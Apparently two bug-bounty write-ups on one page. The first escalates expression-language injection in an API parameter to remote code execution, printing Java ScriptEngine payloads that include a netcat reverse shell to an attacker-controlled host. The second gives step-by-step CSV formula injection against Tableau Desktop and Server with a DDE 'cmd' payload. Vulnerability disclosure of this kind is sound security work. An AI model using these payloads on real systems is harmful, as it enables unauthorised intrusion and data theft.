Read more about EL Injection here

So I injected payload ${\"HOLA\".toString().replace(\"L\", \"G\")} (reported by Burp) in timestamp parameter which will simply replace the alphabet “L”with “G” from word HOLA & got word HOGA in API’s error response as shown in below figure

Above figure shows that our little code actually executed at server-side and gave us the response. It was the time to figure out to which language this code belonged to and I came to know that it has something to do with Java.

So, I tried another payload ${1337*1337} that did simple multiplication and gave us result 1787569 in error response. Hmmm so basically this vulnerability can at least help us do our Math homework :P

I referred  beautiful article written about Server-Side Template Injection by portswigger and followed the article to figure out the template engine in order to exploit the vulnerability further but unfortunately it end-up telling us that either its not vulnerable or unknown template engine is being used as none of the payloads worked after the first payload mentioned in below figure

I spent a day to figure out a way to exploit this bug but no luck. Hmmm, so I needed an expert advice on this bug and to exploit it, the coffee was very much needed 😊So, I requested my colleague who is an awesome programmer turned security person turned awesome bug bounty hunter Anurag to take a look of this bug and help in exploiting it further.

He took his own sweet time and managed to call various java methods and figured out a way to invoke threads and running it and I knew its done the moment I heard word threads from him. We also came to know that it was javascript engine manager behind all of this.

Also, thanks to this article Anurag came across who also faced same kind of scenario and end-up performing RCE.

So, I got the payload crafted to first check if system commands are executing at server-side. So, I basically used Burp Collaborator to check if we are getting the response and we actually got the response validating that the system commands are executing

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"ping\\\",\\\"szvta3myzyhu8udxodgghh6hm8sygn.burpcollaborator.net\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

Now, its time to fire the API with our final payload to get a bash shell which we all love like anything 😊 So I turned on Netcat listener on port 443 on my VPS because the system we are targeting is a docker container on AWS & allows outbound connection for port 80 & 443 only.

${'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"nc\\\",\\\"-nv\\\",\\\"<Your-IP>\\\",\\\"443\\\",\\\"-e\\\",\\\"/bin/bash\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}

And here I got the shell as shown in below figure. I got lot of critical information that I cannot disclose here but you can understand what all things you can do once you get the shell 😉Below are the snapshot of some info:

So, it was lot of learning in performing remote code execution with expression language injection.

Tableau Server Version: 10.1.13 (10100.17.1130.2000) 64-bit
Tableau Desktop Version: 10.1.13 (10100.17.1130.2000) 64-bit

What is Tableau?
Tableau is groundbreaking data visualization software created by Tableau Software. Tableau connects easily to nearly any data source, be it corporate Data Warehouse, Microsoft Excel or web-based data. Tableau allows for instantaneous insight by transforming data into visually appealing, interactive visualizations called dashboards. This process takes only seconds or minutes rather than months or years, and is achieved by an easy to use drag-and-drop interface.

What is Tableau Desktop & Server?
All the development is done in Tableau Desktop. Here, we can create reports, charts, format them, putting them together as a dashboard all the is done on Tableau Desktop.
Whereas, the dashboards created using Tableau Desktop are shared with other users using Tableau Server. When you publish a Dashboard to Tableau Server from Tableau Desktop, other users can access those Dashboards by logging on Tableau Server.
As part of my research, I found Tableau Desktop & Server vulnerable to CSV Injection attack.
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for compromising the computer remotely.
Read Here more about CSV Injection

Many of the companies including Google do not treat CSV Injection as a bug but expected behavior. However, scenarios could turn this “expected behavior” to “severe vulnerability” if target customers are the employees of top notch companies like Google, SpaceX, Adobe, Yahoo, Microsoft, Deloitte, Ernst & Young, U.S. Bank, etc.
Yes, above are the Tableau customers thus compromising any of the employee’s computer using CSV Injection could compromise sensitive data or compromise the whole corporate network.

Reproduction Steps:

1. Create a normal excel file
   

2. Login into the Tableau Desktop and open the above excel
   
   

3. Change the values “A1” & “B1” to payload “=cmd|’/C start iexplore www.malicioussite.com’ !’A2’” & “=cmd|’/C start iexplore www.malicioussite.com’ !’A1’” respectively and publish it to the Tableau Server.
   
   
   

4. Login into the Tableau Server
   

5. Goto Tasks > Open Any Worksheet listed > Click Edit > Create New Worksheet
   
   
   
   

6. Add a new data source and search for your published data. Add the data source into worksheet, double click the values and it will be added into the worksheet.
   
   

7. Now, download the worksheet as Crosstab and it will downloaded as CSV file
   

8. Open the CSV file, couple of warnings and the payload will execute opening the webpage URL put into the payload.
   
   
   

Keeping in mind the top customers Tableau has, there is no space for even a little vulnerability as there is no patch for Human Stupidity & one may ingore the warnings succeeding in executing the payload compromising the machine. However, it requires advance payload to bypass corporate level firewall & antivirus.